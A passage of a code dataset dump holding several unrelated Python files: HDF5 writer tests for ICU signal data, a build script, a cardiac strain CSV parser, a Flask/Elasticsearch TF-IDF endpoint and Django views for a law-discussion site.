writer:\n writer.write_static_data(static_data)\n writer.write_signal(measurement)\n\n with Writer(temp_file.name) as writer:\n with pytest.raises(Exception) as e_info:\n writer.write_static_data(static_data)\n assert str(e_info.value) == expected_error_message\n with pytest.raises(Exception) as e_info:\n writer.write_signal(measurement)\n assert str(e_info.value) == expected_error_message\n\n writer.set_visit_id(visit_id)\n writer.write_static_data(static_data)\n writer.write_signal(measurement)\n\n\ndef test_write_static_data(temp_file, fake_signal):\n static_data = fake_signal.get_static_data()\n visit_id = get_visit_id()\n\n with Writer(temp_file.name) as writer:\n writer.set_visit_id(visit_id)\n assert len(writer[\"edw\"][visit_id].attrs) == 0\n writer.write_static_data(static_data)\n\n with h5py.File(temp_file.name, \"r\") as output_file:\n base_dir = output_file[\"edw\"][visit_id]\n assert len(base_dir.attrs) == 20\n for key in base_dir.attrs.keys():\n if isinstance(base_dir.attrs[key], np.ndarray):\n assert np.array_equal(\n base_dir.attrs[key],\n getattr(static_data, key.lower()),\n )\n else:\n assert base_dir.attrs[key] == getattr(static_data, key.lower())\n\n\ndef test_write_data(temp_file, fake_signal):\n measurement = fake_signal.get_measurement()\n medication = fake_signal.get_medication()\n procedure = fake_signal.get_procedure()\n bedmaster_signal = fake_signal.get_bedmaster_signal()\n\n visit_id = get_visit_id()\n with Writer(temp_file.name) as writer:\n writer.set_visit_id(visit_id)\n writer.write_signal(measurement)\n\n with h5py.File(temp_file.name, \"r\") as output_file:\n base_dir = output_file[\"edw\"][visit_id][measurement._source_type.lower()]\n assert list(base_dir.keys()) == [measurement.name.lower()]\n signal_dir = base_dir[measurement.name.lower()]\n\n arrays, attrs = get_attributes(measurement)\n assert_dir(signal_dir, measurement, arrays, attrs)\n\n signals = [medication, procedure, bedmaster_signal]\n with Writer(temp_file.name, visit_id=visit_id) as writer:\n for signal in signals:\n writer.write_signal(signal)\n\n with h5py.File(temp_file.name, \"r\") as output_file:\n for signal in signals:\n if isinstance(signal, BedmasterType):\n signal_source = \"bedmaster\"\n elif isinstance(signal, EDWType):\n signal_source = \"edw\"\n else:\n raise ValueError(f\"Signal type {type(signal)} not Bedmaster or EDW\")\n base_dir = output_file[signal_source][visit_id]\n signal_base_dir = 
base_dir[signal._source_type.lower()]\n signal_name = signal.name.replace(\"/\", \"|\").lower()\n assert list(signal_base_dir.keys()) == [signal_name]\n\n arrays, attrs = get_attributes(signal)\n signal_dir = signal_base_dir[signal_name]\n assert_dir(signal_dir, signal, arrays, attrs)\n\n\ndef test_name_conflict(temp_file, fake_signal):\n\n m1_signal = fake_signal.get_measurement()\n m2_signal = fake_signal.get_measurement()\n\n m2_signal.source = \"EDW_med\"\n\n assert m1_signal.name == m2_signal.name\n assert m1_signal.source != m2_signal.source\n\n visit_id = get_visit_id()\n with Writer(temp_file.name) as writer:\n writer.set_visit_id(visit_id)\n writer.write_signal(m1_signal)\n writer.write_signal(m2_signal)\n\n with h5py.File(temp_file.name, \"r\") as output_file:\n m1_dir = output_file[\"edw\"][visit_id][m1_signal._source_type.lower()]\n m2_dir = output_file[\"edw\"][visit_id][m2_signal._source_type.lower()]\n\n def _test(m_dir, m_signal):\n assert list(m_dir.keys()) == [m_signal.name.lower()]\n signal_dir = m_dir[m_signal.name.lower()]\n arrays, attrs = get_attributes(m_signal)\n assert sorted(list(signal_dir.keys())) == sorted(arrays)\n for key in arrays:\n expected = getattr(m_signal, key.lower())\n if isinstance(expected, dict):\n for k in expected:\n assert k.lower() in signal_dir[key]\n else:\n value = signal_dir[key][()]\n assert np.array_equal(value, expected)\n for attr in attrs:\n value = signal_dir.attrs[attr]\n expected = getattr(m_signal, attr.lower())\n assert np.array_equal(value, expected)\n\n _test(m1_dir, m1_signal)\n _test(m2_dir, m2_signal)\n\n\ndef test_write_multiple_files(temp_file, fake_signal):\n visit_id = get_visit_id()\n\n wv_signal1 = fake_signal.get_bedmaster_signal()\n wv_signal2 = fake_signal.get_bedmaster_signal()\n wv_arrays, wv_attr = get_attributes(wv_signal1)\n\n with Writer(temp_file.name, visit_id=visit_id) as writer:\n writer.write_signal(wv_signal1)\n writer.write_signal(wv_signal2)\n\n with h5py.File(temp_file.name, \"r\") as output_file:\n wv_base_dir = output_file[\"bedmaster\"][visit_id][\"waveform\"]\n wv_name = wv_signal1.name.replace(\"/\", \"|\").lower()\n assert sorted(list(wv_base_dir.keys())) == [wv_name]\n\n wv_signal_dir = wv_base_dir[wv_name]\n\n assert sorted(list(wv_signal_dir.attrs.keys())) == sorted(wv_attr)\n\n for field in wv_attr:\n assert wv_signal_dir.attrs[field] == getattr(wv_signal1, field)\n\n assert sorted(list(wv_signal_dir.keys())) == sorted(wv_arrays)\n for field in wv_signal_dir:\n if field == \"sample_freq\":\n continue\n value = wv_signal_dir[field][()]\n expected = np.concatenate(\n (\n getattr(wv_signal1, field.lower()),\n getattr(wv_signal2, field.lower()),\n ),\n )\n assert len(value) == len(expected)\n assert np.array_equal(value, expected)\n\n corrected_sf2 = np.fromiter(\n [(sf, idx + wv_signal1.value.size) for sf, idx in wv_signal2.sample_freq],\n dtype=\"float,int\",\n )\n expected_sf = np.concatenate([wv_signal2.sample_freq, corrected_sf2])\n assert np.array_equal(wv_signal_dir[\"sample_freq\"][()], expected_sf)\n\n\ndef assert_dir(\n signal_dir: h5py.Group,\n signal: ICUDataObject,\n names: List[str],\n attrs: List[str],\n):\n assert sorted(list(signal_dir.keys())) == sorted(names)\n for field in signal_dir:\n expected = getattr(signal, field.lower())\n if isinstance(expected, dict):\n for k in expected:\n assert k.lower() in signal_dir[field]\n else:\n value = signal_dir[field][()]\n assert np.array_equal(value, expected)\n\n assert sorted(list(signal_dir.attrs.keys())) == sorted(attrs)\n for 
field in attrs:\n assert signal_dir.attrs[field] == getattr(signal, field)\n","sub_path":"tests/icu_ingest/test_writer.py","file_name":"test_writer.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"419905273","text":"#===============================================================================\n# @brief Config platform Sconscript\n# Copyright (c) 2017 NEUL LIMITED\n#===============================================================================\n\nImport('env')\nimport os\nfrom EnvironmentUtils import NeulTargetConfig, BuildType\nfrom ModuleUtils import Module\n\nmodule = 'config_platform'\nsource_files = []\n\nif (NeulTargetConfig.get_build_core(env) in ['application_core']):\n additional_release_file_list = Glob(os.path.join('sdk', NeulTargetConfig.get_build_chip(env), '*.json'))\nelse:\n additional_release_file_list = []\n\nif NeulTargetConfig.get_build_type(env) in [BuildType.SOURCE_PACKAGE,BuildType.DOXYGEN]:\n mod = Module(module, env,\n sources = source_files,\n public_inc_dirs = [],\n private_inc_dirs = [],\n additional_release_files = additional_release_file_list )\n\n product = mod.build(env)\n Return ('product')\nelse:\n Return('source_files')\n","sub_path":"4.Network_Communication/TCPsendAndReceiveData/ProjectTCP/src/config/platform/SConscript","file_name":"SConscript","file_ext":"Network_Communication/TCPsendAndReceiveData/ProjectTCP/src/config/platform/SConscript","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"340755380","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 10 15:59:41 2019\r\n\r\n@author: vjha1\r\n\"\"\"\r\n\r\ndef LV2(filename):\r\n import pandas as pd\r\n import numpy as np\r\n import csv\r\n\r\n\r\n df = pd.read_csv (filename)\r\n data1 = df.to_numpy()\r\n\r\n #Global Results Table RV2D, LV2D, LV3D\r\n Globewhere = np.argwhere(data1 == \"Global\")\r\n \r\n LVSax = data1[Globewhere[0,0]]\r\n LVSax = LVSax.tolist()\r\n del LVSax[0:2]\r\n #print(RVSax)\r\n \r\n LVLax = data1[Globewhere[1,0]]\r\n LVLax = LVLax.tolist()\r\n del LVLax[0:2]\r\n #print(RVLax)\r\n \r\n LV3D = data1[Globewhere[2,0]]\r\n LV3D = LV3D.tolist()\r\n del LV3D[0:2]\r\n #skip data1[Globewhere[2,0]]\r\n \r\n RVSax = data1[Globewhere[3,0]]\r\n RVSax = RVSax.tolist()\r\n del RVSax[0:2]\r\n #print(LVSax)\r\n \r\n RVLax = data1[Globewhere[4,0]]\r\n RVLax = RVLax.tolist()\r\n del RVLax[0:2]\r\n #print(LVLax)\r\n \r\n RV3DRadial = [0]*2\r\n RV3DRadialp = data1[Globewhere[18,0]]\r\n RV3DRadialp = RV3DRadialp.tolist()\r\n RV3DRadialp.pop(0)\r\n del RV3DRadialp[20:26]\r\n #RV3DRadial1 = np.array(RV3DRadial)\r\n #float(RV3DRadial)\r\n #print(RV3DRadialp)\r\n RV3DRadialp = max(RV3DRadialp, key=float)\r\n \r\n RV3DRadialrate = data1[Globewhere[19,0]]\r\n RV3DRadialrate = RV3DRadialrate.tolist()\r\n RV3DRadialrate.pop(0)\r\n del RV3DRadialrate[20:26]\r\n #print(RV3DRadialrate)\r\n RV3DRadialrate = max(RV3DRadialrate, key=float)\r\n \r\n RV3DRadial = [RV3DRadialp, RV3DRadialrate]\r\n \r\n RV3DCircum = [0]*2\r\n \r\n RV3DCircump = data1[Globewhere[22,0]]\r\n RV3DCircump = RV3DCircump.tolist()\r\n RV3DCircump.pop(0)\r\n del RV3DCircump[20:26]\r\n RV3DCircump = min(RV3DCircump, key=float)\r\n \r\n \r\n RV3DCircumrate = data1[Globewhere[23,0]]\r\n RV3DCircumrate = RV3DCircumrate.tolist()\r\n RV3DCircumrate.pop(0)\r\n del RV3DCircumrate[20:26]\r\n RV3DCircumrate = min(RV3DCircumrate, key=float)\r\n \r\n RV3DCircum = 
[RV3DCircump, RV3DCircumrate]\r\n \r\n RV3DLong = [0]*2\r\n \r\n RV3DLongp = data1[Globewhere[26,0]]\r\n RV3DLongp = RV3DLongp.tolist()\r\n RV3DLongp.pop(0)\r\n del RV3DLongp[20:26]\r\n RV3DLongp = min(RV3DLongp, key=float)\r\n \r\n RV3DLongrate = data1[Globewhere[27,0]]\r\n RV3DLongrate = RV3DLongrate.tolist()\r\n RV3DLongrate.pop(0)\r\n del RV3DLongrate[20:26]\r\n RV3DLongrate = min(RV3DLongrate, key=float)\r\n \r\n RV3DLong = [RV3DLongp, RV3DLongrate]\r\n \r\n \r\n torsionwhere = np.argwhere(data1 == \"torsion\")\r\n RVTorsion = data1[torsionwhere[1,0]]\r\n RVTorsion = RVTorsion.tolist()\r\n RVTorsion.pop(0)\r\n del RVTorsion[20:26]\r\n RVTorsion = max(RVTorsion, key=float)\r\n #print(RVTorsion)\r\n \r\n LVTorsion = data1[torsionwhere[0,0]]\r\n LVTorsion = LVTorsion.tolist()\r\n LVTorsion.pop(0)\r\n #print(LVTorsion)\r\n del LVTorsion[20:26]\r\n LVTorsion = max(LVTorsion, key=float)\r\n \r\n #print(LVTorsion)\r\n \r\n patientwhere = np.argwhere(data1 == \"Patient\")\r\n pnamefull = data1[patientwhere[0,0]]\r\n pnamefull = pnamefull.tolist()\r\n pnamefull.pop(0)\r\n fullname = pnamefull[0]\r\n Name = fullname.split(',')\r\n \r\n birthdatewhere = np.argwhere(data1 == \"Birth Date\")\r\n bdate = data1[birthdatewhere[0,0]]\r\n bdate = bdate.tolist()\r\n bdate.pop(0)\r\n \r\n IDwhere = np.argwhere(data1 == \"PatientID\")\r\n pid = data1[IDwhere[0,0]]\r\n pid = pid.tolist()\r\n pid.pop(0)\r\n \r\n Sdatewhere = np.argwhere(data1 == \"Study Date\")\r\n Sdate = data1[Sdatewhere[0,0]]\r\n Sdate = Sdate.tolist()\r\n Sdate.pop(0)\r\n \r\n #LV Measurements\r\n #Search: EDV, ESV, SV,HR,CO,EF,MyoMass_diast\r\n \r\n edvwhere = np.argwhere(data1 == \"EDV\")\r\n edv = data1[edvwhere[0,0]]\r\n edv = edv.tolist()\r\n edv.pop(0)\r\n \r\n esvwhere = np.argwhere(data1 == \"ESV\")\r\n esv = data1[esvwhere[0,0]]\r\n esv = esv.tolist()\r\n esv.pop(0)\r\n \r\n svwhere = np.argwhere(data1 == \"SV\")\r\n sv = data1[svwhere[0,0]]\r\n sv = sv.tolist()\r\n sv.pop(0)\r\n \r\n hrwhere = np.argwhere(data1 == \"HR\")\r\n hr = data1[hrwhere[0,0]]\r\n hr = hr.tolist()\r\n hr.pop(0)\r\n \r\n COwhere = np.argwhere(data1 == \"CO\")\r\n co = data1[COwhere[0,0]]\r\n co = co.tolist()\r\n co.pop(0)\r\n \r\n EFwhere = np.argwhere(data1 == \"EF\")\r\n ef = data1[EFwhere[0,0]]\r\n ef = ef.tolist()\r\n ef.pop(0)\r\n \r\n LVMwhere = np.argwhere(data1 == \"MyoMass_diast\") \r\n lvm = data1[LVMwhere[0,0]]\r\n lvm = lvm.tolist()\r\n lvm.pop(0)\r\n \r\n #Assemble data into single list\r\n procdata = [Name[0], Name[1], Sdate[0], \"1\",\"Vibhav\",\"nan\", \"nan\", pid[0], bdate[0], \r\n hr[0], edv[0], esv[0], sv[0], ef[0], co[0], lvm[0], LVLax[2], LVLax[8], \r\n LV3D[2], LV3D[8], LVSax[1], LVSax[7], LV3D[1], \r\n LV3D[7], LVSax[0], LVLax[0], LVSax[6], LVLax[6], \r\n LV3D[0], LV3D[6], LVTorsion, RVLax[2], RVLax[8],RV3DLong[0], \r\n RV3DLong[1], RVSax[1], RVSax[7], RV3DCircum[0], RV3DCircum[1], \r\n RVSax[0], RVLax[0], RVSax[6], RVLax[6], RV3DRadial[0], \r\n RV3DRadial[1], RVTorsion]\r\n \r\n print(procdata)\r\n \r\n with open(\"FHS_autodata.csv\", \"a\", newline=\"\") as fp:\r\n writer = csv.writer(fp)\r\n writer.writerow(procdata)","sub_path":"lvfirst.py","file_name":"lvfirst.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"511164052","text":"from flask import Blueprint\r\n\r\nmod = Blueprint('api_tfidf',__name__)\r\n\r\n\r\nfrom flask_api import FlaskAPI\r\nimport cx_Oracle\r\nimport xml.etree.ElementTree as ET\r\nfrom elasticsearch import 
Elasticsearch\r\nimport lxml.etree as ET2\r\n\r\n\r\napp=FlaskAPI(__name__)\r\n\r\n@mod.route('/', defaults={'path' : ''})\r\n@mod.route('/<schema>/tfidf', methods = ['GET'])\r\ndef tfidf(schema):\r\n\r\n    \r\n    import numpy as np\r\n    import re\r\n\r\n    # Connect to the Elasticsearch database\r\n    dbes = Elasticsearch([{'host' : 'localhost', 'port' : 9200}])\r\n    \r\n\r\n    print('Connected to the Elasticsearch database')\r\n    CorpusTotal = []\r\n    \r\n    query={\"query\": {\"match_all\":{}}}\r\n    banco_cand = dbes.search(index = schema+'_pool_candidatos',doc_type = 'candidatos',scroll='10m',search_type = 'query_then_fetch', size=10, body=query)\r\n    sid = banco_cand['_scroll_id']\r\n    scroll_size = len(banco_cand['hits']['hits'])\r\n    \r\n    \r\n    banco_vagas = dbes.search(index = schema+'_pool_vagas', doc_type = 'vagas', size=1000)\r\n\r\n    \r\n    # Clean the text: strip unwanted characters and join each document into one string\r\n    \r\n    candidatos_corpus = []\r\n    vagas_corpus = []\r\n    \r\n    def limpador1(banco_cand):\r\n        for doc in banco_cand['hits']['hits']:\r\n            \r\n            texto = doc['_source']['text']\r\n            \r\n            cand_corpus=[]\r\n            for bloco_tex in texto:\r\n                \r\n                curri = re.sub(\"[0-9]\", ' ', bloco_tex)\r\n                curri = re.sub(\"[+.*@:,?/;% \\\\n]\", ' ', curri)\r\n                curri = curri.lower() # lowercase\r\n                curri = curri.split() # split into words\r\n                curri = ' '.join(curri) # rejoin the block\r\n                cand_corpus.append(curri)\r\n            cand_corpus=' '.join(cand_corpus) # one string per document\r\n            candidatos_corpus.append(cand_corpus)\r\n        return candidatos_corpus \r\n    \r\n    # Clean the text: strip unwanted characters and join each document into one string\r\n    \r\n    def limpador2(banco_vagas):\r\n        for doc in banco_vagas['hits']['hits']:\r\n            \r\n            texto = doc['_source']['text']\r\n            \r\n            vaga_corpus = []\r\n            for bloco_tex in texto:\r\n                \r\n                vaga = re.sub(\"[0-9]\", ' ', bloco_tex)\r\n                vaga = re.sub(\"[+.*@:,?/;% \\\\n]\", ' ', vaga)\r\n                vaga = vaga.lower() # lowercase\r\n                vaga = vaga.split() # split into words\r\n                vaga = ' '.join(vaga) # rejoin the block \r\n                vaga_corpus.append(vaga)\r\n            \r\n            vaga_corpus=' '.join(vaga_corpus) # one string per document \r\n            vagas_corpus.append(vaga_corpus) \r\n        \r\n        return vagas_corpus\r\n    \r\n    \r\n    limpador1(banco_cand)\r\n    limpador2(banco_vagas)\r\n    \r\n    #candidatos_corpus_t=candidatos_corpus\r\n    #print(len(candidatos_corpus_t))\r\n    \r\n    while (scroll_size > 0) :\r\n        banco_cand = dbes.scroll(scroll_id = sid, scroll = '2m')\r\n        sid = banco_cand['_scroll_id']\r\n        scroll_size = len(banco_cand['hits']['hits'])\r\n        \r\n        limpador1(banco_cand)\r\n        print(len(candidatos_corpus))\r\n#    candidatos_corpus_t=candidatos_corpus\r\n#    \r\n    CorpusTotal = candidatos_corpus + vagas_corpus\r\n\r\n    \r\n    print(len(CorpusTotal))\r\n    \r\n    print('Text cleaning finished')\r\n    \r\n    # ==== Creating the Bag of Words model ===== \r\n    \r\n    # --------------------TF-------------------\r\n    \r\n    from sklearn.feature_extraction.text import CountVectorizer\r\n    cv = CountVectorizer(max_features = 2000)\r\n    Sparsa = cv.fit_transform(CorpusTotal).toarray()\r\n    \r\n    tam=len(CorpusTotal) # number of documents in the corpus (jobs + candidates)\r\n    \r\n    print('TF construction finished')\r\n    \r\n    # -------- Normalization -------------------\r\n    NOR = []\r\n    for t in Sparsa: \r\n        su = sum(t)\r\n        X22 = (t/su).tolist() \r\n        print(X22)\r\n        NOR.append(X22)\r\n    print('Normalization finished')\r\n    \r\n    # Convert to array \r\n    \r\n    NORAr = np.asarray(NOR) \r\n    NORArTr = NORAr.transpose()\r\n
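    \r\n    # Editor's note (sketch, not the original pipeline): scikit-learn bundles the\r\n    # TF matrix above plus the document-frequency/IDF steps below into a single\r\n    # transformer; an equivalent starting point would be\r\n    #\r\n    #     from sklearn.feature_extraction.text import TfidfVectorizer\r\n    #     tfidf_matrix = TfidfVectorizer(max_features=2000).fit_transform(CorpusTotal)\r\n    #\r\n    # (sklearn smooths and offsets IDF by default, so its values differ slightly\r\n    # from the manual log(N / (1 + df)) used here.)\r\n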
    \r\n    # Count how many documents each word appears in:\r\n    \r\n    dif_zero = [] # nonzero-document count per word\r\n    \r\n    for c in NORArTr:\r\n        count_dif = 0\r\n        for cc in c: \r\n            if cc > 0:\r\n                count_dif += 1 \r\n        dif_zero.append(count_dif)\r\n\r\n    \r\n    \r\n    #----------------IDF------------------------\r\n    \r\n    Xidf = []\r\n    \r\n    for k in range(0, len(Sparsa[0][:])):\r\n        idfw = np.log(tam/(1 + dif_zero[k]))\r\n        Xidf.append(idfw)\r\n    \r\n    print('IDF vector finished')\r\n    # -------------TFIDF-------------------- \r\n\r\n    TFIDF=[]\r\n    \r\n    for d in Sparsa:\r\n        mul_tfidf = [a*b for a,b in list(zip(d,Xidf))]\r\n        TFIDF.append(mul_tfidf)\r\n    \r\n    print('TFIDF finished for all jobs and candidates')\r\n    \r\n    # Save or update the TFIDF value:\r\n    \r\n    # in the candidate documents \r\n    \r\n    print('Updating jobs and candidates with TFIDF') \r\n    ind = 0\r\n    query={\"query\": {\"match_all\": {}}}\r\n    ess1 = dbes.search(index = schema+'_pool_candidatos', doc_type = 'candidatos',scroll='2m',search_type = 'query_then_fetch', size=1000,body=query)\r\n    sid = ess1['_scroll_id']  # take the scroll id from this search (the original reused banco_cand's expired scroll)\r\n    scroll_size = len(ess1['hits']['hits'])\r\n    \r\n    for doc in ess1['hits']['hits']:\r\n        \r\n        item1 = doc['_source']['cod_cand']\r\n        \r\n        dbes.update(index = schema+'_pool_candidatos', doc_type = 'candidatos', id = item1 , body = {\"doc\":\r\n            {'TFIDF': TFIDF[ind]} \r\n            })\r\n        print(item1) # candidate code\r\n        ind += 1\r\n    ind2 = ind \r\n    \r\n    while (scroll_size > 0) :\r\n        ess1 = dbes.scroll(scroll_id = sid, scroll = '10m')  # fetch the next page (the original re-read the first page here)\r\n        sid = ess1['_scroll_id']\r\n        scroll_size = len(ess1['hits']['hits'])\r\n        for doc in ess1['hits']['hits']:\r\n            \r\n            item1 = doc['_source']['cod_cand']\r\n            \r\n            dbes.update(index = schema+'_pool_candidatos', doc_type = 'candidatos', id = item1 , body = {\"doc\":\r\n                {'TFIDF': TFIDF[ind2]} \r\n                })\r\n            print(item1) # candidate code\r\n            ind2 += 1\r\n    \r\n    \r\n    ess2 = dbes.search(index = schema+'_pool_vagas', doc_type = 'vagas', size = 10000)\r\n    ind3 = ind2\r\n    \r\n    # in the job documents\r\n    for doc in ess2['hits']['hits']:\r\n        \r\n        item1 = doc['_source']['cod_vaga']\r\n        \r\n        dbes.update(index = schema+'_pool_vagas', doc_type = 'vagas', id = item1 , body = {\"doc\":\r\n            {'TFIDF':TFIDF[ind3]} \r\n            })\r\n        print(item1) # job code\r\n        ind3 += 1 \r\n    print('TFIDF upload to the ES database finished')\r\n#    \r\n    return TFIDF","sub_path":"api/api_tfidf/api_tfidf.py","file_name":"api_tfidf.py","file_ext":"py","file_size_in_byte":6902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"640654000","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nfrom django.http import Http404, JsonResponse, HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.template.loader import render_to_string\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views.decorators.http import require_POST\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.contrib.contenttypes.models import ContentType\nfrom CreateYourLaws.models import LawCode, LawArticle\nfrom CreateYourLaws.models import CodeBlock, Question, Disclaim\nfrom CreateYourLaws.models import Explaination, Opinion, Proposition\nfrom CreateYourLaws.models import Note\nfrom CreateYourLaws.forms import QuestionForm, Create_CYL_UserForm\nfrom CreateYourLaws.forms import PropositionForm, Del_account_form\nfrom CreateYourLaws.forms import 
{"seq_id":"640654000","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nfrom django.http import Http404, JsonResponse, HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.template.loader import render_to_string\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views.decorators.http import require_POST\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.contrib.contenttypes.models import ContentType\nfrom CreateYourLaws.models import LawCode, LawArticle\nfrom CreateYourLaws.models import CodeBlock, Question, Disclaim\nfrom CreateYourLaws.models import Explaination, Opinion, Proposition\nfrom CreateYourLaws.models import Note\nfrom CreateYourLaws.forms import QuestionForm, Create_CYL_UserForm\nfrom CreateYourLaws.forms import PropositionForm, Del_account_form\nfrom CreateYourLaws.forms import ExplainationForm, OpinionForm, DisclaimForm\nfrom CreateYourLaws.forms import Info_Change_Form\nfrom CreateYourLaws.views_functions import get_path, get_the_instance\nfrom django.utils.translation import ugettext as _\nfrom django.template.response import TemplateResponse\n\n\n@login_required\ndef home(request):\n    \"\"\" Example HTML page; kept invalid so that the example stays concise \"\"\"\n    qs = LawCode.objects.all()\n    lqs = list(qs)\n    return render(request, 'home.html', locals())\n\n\n# ################################# nav JStree ################################\n\n@login_required\ndef nav_up(request, idbox):\n    \"\"\"ajax for CYL nav: update the tree\"\"\"\n    id_box = int(idbox[1:len(idbox)])\n    children = []\n    JSON_obj = []\n    if idbox[0] == 'A':\n        listArticle = list(\n            LawArticle.objects.filter(law_code=id_box,\n                                      block_id__isnull=True).order_by('id'))\n    else:\n        listArticle = list(\n            LawArticle.objects.filter(block=id_box).order_by('id'))\n    if listArticle:\n        for el in listArticle:\n            children.append(('C' + str(el.id),\n                             el.title,\n                             \"GetReflection\",\n                             'loi:' + str(el.id),\n                             False))\n    if idbox[0] == 'A':\n        listBlock = list(\n            CodeBlock.objects.filter(rank=1, law_code=id_box).order_by('id'))\n    else:\n        listBlock = list(\n            CodeBlock.objects.filter(block=id_box).order_by('id'))\n    if listBlock:\n        for el in listBlock:\n            children.append(('B' + str(el.id),\n                             el.title,\n                             \"InDatBox\",\n                             '2:' + str(el.id),\n                             True))\n    for elem in children:\n        # 'B' in the 'id' param informs that this is a Code Block\n        JSON_obj.append({'id': elem[0],\n                         'text': elem[1],\n                         'a_attr': {'class': elem[2],\n                                    'name': elem[3]},\n                         'children': elem[4]})\n    return JsonResponse(JSON_obj, safe=False)\n\n\n@login_required\ndef nav_init(request):\n    \"\"\"ajax for CYL nav: init the tree\"\"\"\n    law_codes = list(LawCode.objects.all())\n    JSON_obj = []\n    for i, el in enumerate(law_codes):\n        # 'A' in the 'id' param informs that this is a Law code\n        JSON_obj.append({'id': 'A' + str(el.id),\n                         'text': el.title,\n                         'a_attr': {\"class\": \"InDatBox\",\n                                    \"name\": \"1:\" + str(el.id)},\n                         'children': True})\n    return JsonResponse(JSON_obj, safe=False)\n\n\n# ################################ UP and DOWN ################################\n\n@login_required\n@require_POST\ndef UP(request):\n    if request.method == 'POST':\n        user = request.user\n        slug = request.POST.get('slug', None)\n        typ, Id = slug.split(sep=\":\")\n        obj = get_the_instance(typ, Id)\n        ct = ContentType.objects.get_for_model(obj)\n        # -------------------------------------------------------------\n        # About propositions: a User must hold exactly one position.\n        # It is impossible to approve both a Law and a counter-proposition\n        # about that Law, or two counter-propositions about the same law.\n        # -------------------------------------------------------------\n        data = {}\n        if isinstance(obj, Proposition):\n            try:\n                note = Note.objects.get(user=user,\n                                        content_type=ct,\n                                        object_id=obj.id)\n                getit = bool(note.approve)\n            except Exception:\n                getit = False\n            listprop = list(Proposition.objects.filter(\n                law_article=obj.law_article))\n            for x in listprop:\n                data['#donprp' + str(x.id)] = str(x.approval_ratio)\n                x.notes.filter(user=user, approve=True).delete()\n            lart = obj.law_article\n            data['#donloi' + str(lart.id)] = str(lart.approval_ratio)\n            lart.notes.filter(user=user, approve=True).delete()\n        elif isinstance(obj, LawArticle):\n            getit = False\n            listprop = list(Proposition.objects.filter(\n                law_article=obj))\n            for x in listprop:\n                data['#donprp' + str(x.id)] = str(x.approval_ratio)\n                
x.notes.filter(user=user, approve=True).delete()\n        else:\n            getit = False\n        # -------------------------------------------------------------\n        note, created = Note.objects.get_or_create(user=user,\n                                                   content_type=ct,\n                                                   object_id=obj.id)\n        if (created is False and note.approve) or getit:\n            message = \"You already approve of this reflection.\"\\\n                + \"\\nYou can approve or\"\\\n                + \" disapprove a reflection only once.\"\\\n                + \"\\nYou can, however, change \"\\\n                + \"your mind as many times as you want.\"\n        else:\n            message = \"\"\n            note.approve = True\n            note.save()\n        obj = get_the_instance(typ, Id)\n        ctx = {'message': message,\n               'approb': str(obj.approval_ratio),\n               'data': data}\n        return JsonResponse(ctx)\n\n\n@login_required\n@require_POST\ndef DOWN(request):\n    if request.method == 'POST':\n        user = request.user\n        slug = request.POST.get('slug', None)\n        typ, Id = slug.split(sep=\":\")\n        obj = get_the_instance(typ, Id)\n        ct = ContentType.objects.get_for_model(obj)\n        note, created = Note.objects.get_or_create(user=user,\n                                                   content_type=ct,\n                                                   object_id=obj.id)\n        if created is False and note.approve is False:\n            message = \"You already disapprove of this reflection.\"\\\n                + \"\\nYou can approve or\"\\\n                + \" disapprove a reflection only once.\"\\\n                + \"\\nYou can, however, change \"\\\n                + \"your mind as many times as you want.\"\n        else:\n            message = \"\"\n            note.approve = False\n            note.save()\n        obj = get_the_instance(typ, Id)\n        ctx = {'message': message, 'approb': str(obj.approval_ratio)}\n        return JsonResponse(ctx)\n\n\n# ################################# User ####################################\n\ndef Create_User(request):\n    \"\"\" Used to create a new User \"\"\"\n    registered = False\n    if request.method == 'POST':\n        user_form = Create_CYL_UserForm(data=request.POST)\n        if user_form.is_valid():\n            user = user_form.save()\n            user.set_password(user.password)\n            user.save()\n            registered = True\n    else:\n        user_form = Create_CYL_UserForm()\n    return render(request, 'registration.html', locals())\n\n\ndef Checkbox(request):  # To be reworked\n    print('FUNCTION CALLED')\n    if request.method == 'POST':\n        typeref = request.POST.get('typeref', None)\n        ref_id = request.POST.get('ref_id', None)\n        checked = request.POST.get('check', None)\n    ctx = {}\n    return JsonResponse(ctx)\n\n\n@login_required\ndef info_change_done(request,\n                     template_name='registration/info_change_done.html',\n                     extra_context=None):\n    \"\"\" Triggered when a user has successfully changed their own info \"\"\"\n    context = {\n        'title': _('Info change successful'),\n    }\n    if extra_context is not None:\n        context.update(extra_context)\n    return TemplateResponse(request, template_name, context)\n\n\n@login_required\ndef view_profile(request, set_var=\"info\"):\n    \"\"\" Display and update the user's account settings \"\"\"\n    if request.method == 'POST' and 'infochangebut' in request.POST:\n        infochangeform = Info_Change_Form(user=request.user,\n                                          data=request.POST)\n        set_var = \"info\"\n        if infochangeform.is_valid():\n            infochangeform.save()\n            return redirect('/CYL/info/change/done')\n    else:\n        infochangeform = Info_Change_Form(user=request.user)\n    if request.method == 'POST' and 'pwdchangebut' in request.POST:\n        pwdchangeform = PasswordChangeForm(user=request.user,\n                                           data=request.POST)\n        set_var = \"pwd\"\n        if pwdchangeform.is_valid():\n            pwdchangeform.save()\n            update_session_auth_hash(request, pwdchangeform.user)\n            return redirect('/CYL/accounts/password/change/done')\n    else:\n        pwdchangeform = PasswordChangeForm(user=request.user)\n    if request.method == 'POST' and 
